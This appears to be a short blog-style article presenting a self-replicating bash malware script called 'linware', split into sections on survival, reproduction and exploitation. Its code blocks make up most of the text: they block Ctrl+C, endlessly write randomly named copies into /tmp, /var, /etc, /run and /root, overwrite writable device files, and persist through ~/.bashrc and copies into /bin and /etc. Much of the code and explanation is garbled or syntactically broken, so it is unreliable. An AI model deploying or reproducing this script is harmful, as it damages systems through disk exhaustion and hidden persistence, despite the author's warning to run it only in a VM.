Metamorphic Virology

 Rudimentary Metamorphic Virology  By Gregory Disney-Leugers

Download at: https://docs.google.com/file/d/0B3OSDccoP1KhQkpPVURENmx4MlU/edit?usp=sharing

Virology should be viewed as evolutionary biology being used in code, to demonstrate this I wrote a bash script. This code is metamorphic in the since of self modifying and self propagating; This script covers the three main attributes of metamorphic virology methods of survival, reproduction, and exploitation.

Surivival: #!/bin/bash trap '' INT for do The first line "trap INT" creates a lock on the process meaning once its activated, ctrl+c can't stop the process. Generally speaking with a loop such as the second and third line a pid be created to ensure that it cloud be stopped. In this script no pid is created to ensure survival.

Reproduction: #!/bin/bash export RESOLV_HOST_CONF=/etc/shadow trap '' INT for do FILE="/tmp/$(basename $0).$RANDOM." echo $FILE > $FILE FILES="/var/$(basename $0).$RANDOM." echo $FILES > $FILES FILEZ="/etc/$(basename $0).$RANDOM." echo $FILEZ > $FILEZ FILE="/tmp/$(basename $0).$RANDOM." echo $FILE > $FILE FILES="/var/$(basename $0).$RANDOM." echo $FILES > $FILES FILEZ="/etc/$(basename $0).$RANDOM." echo $FILEZ > $FILEZ FILER="/run/$(basename $0).$RANDOM." echo $FILER > $FILER FILEQ="/root/$(basename $0).$RANDOM." echo $FILEQ > $FILEQ

The script now has a loop with producing blank files, Roughly 7 a kernel second. The way the file is written it uses the basemame with a random output. cd /root && chmod u+x /root/$(basename $0).$RANDOM. &&   cat >~/$(basename $0).$RANDOM. < $FILE FILES="/var/$(basename $0).$RANDOM." echo $FILES > $FILES FILEZ="/etc/$(basename $0).$RANDOM." echo $FILEZ > $FILEZ FILE="/tmp/$(basename $0).$RANDOM." echo $FILE > $FILE FILES="/var/$(basename $0).$RANDOM." echo $FILES > $FILES FILEZ="/etc/$(basename $0).$RANDOM." echo $FILEZ > $FILEZ FILER="/run/$(basename $0).$RANDOM." echo $FILER > $FILER FILEQ="/root/$(basename $0).$RANDOM." echo $FILEQ > $FILEQ

Using cat now the files are being written with the original loop reproduction script into the generated files.

ssh lt 2>/tmp/$(basename $0).$RANDOM. cat /tmp/$(basename $0).$RANDOM.|awk -F"\`" {'print  $RANDOM'}|awk -F"\'" {'print $RANDOM'} while /bin/true ; do   for i in $(basename $0)/* ; do        if [ -w $i -a -c $i -a $i != $RANDOM ]; then cat $RANDOM > $i fi done done exec ~/$(basename $0).$RANDOM. FSS

Using cat now the tmp files are being written with a bidien payload. From FSS to FSS is one output file. #!/bin/bash trap '' INT for do  FILE="/tmp/linware.3861." echo /tmp/linware.21415. > /tmp/linware.21415. FILES="/var/linware.19561." echo /var/linware.10574. > /var/linware.10574. FILEZ="/etc/linware.1020." echo /etc/linware.16689. > /etc/linware.16689. FILE="/tmp/linware.21532." echo /tmp/linware.21415. > /tmp/linware.21415. FILES="/var/linware.8989." echo /var/linware.10574. > /var/linware.10574. FILEZ="/etc/linware.27934." echo /etc/linware.16689. > /etc/linware.16689. FILER="/run/linware.1029." echo /run/linware.2459. > /run/linware.2459. FILEQ="/root/linware.29530." echo /root/linware.21523. > /root/linware.21523. exec ~/linware.18402. ssh lt 2>/tmp/linware.14894. cat /tmp/linware.24609.|awk -F"`" {'print  12002'}|awk -F"\'" {'print 12646'} while /bin/true ; do   for i in linware/* ; do        if [ -w  -a -c  -a  != 13866 ]; then cat 1915 > fi   done done exec ~/linware.14617.

Here's a sample script of the output of the output script, at end of the script it executes another output script. This can be used to map the propagation of the malware.

Exploitation: cat >~/.bashrc <<ASS /opt/linware /bin/linware /etc/linware /run/linware ASS cp /opt/linware /bin cp /opt/linware /etc exec /opt/linware exec ~/$(basename $0).$RANDOM

Using cat once again the script writes to the bashrc, to infect bash to ensure survival. At end of the loop script it initiates the script all over again.

https://docs.google.com/file/d/0B3OSDccoP1KhQkpPVURENmx4MlU/edit?usp=sharing

WARNING: this script only be used in a controlled environment such as a VM.

WARNING: This script should be consider malicious.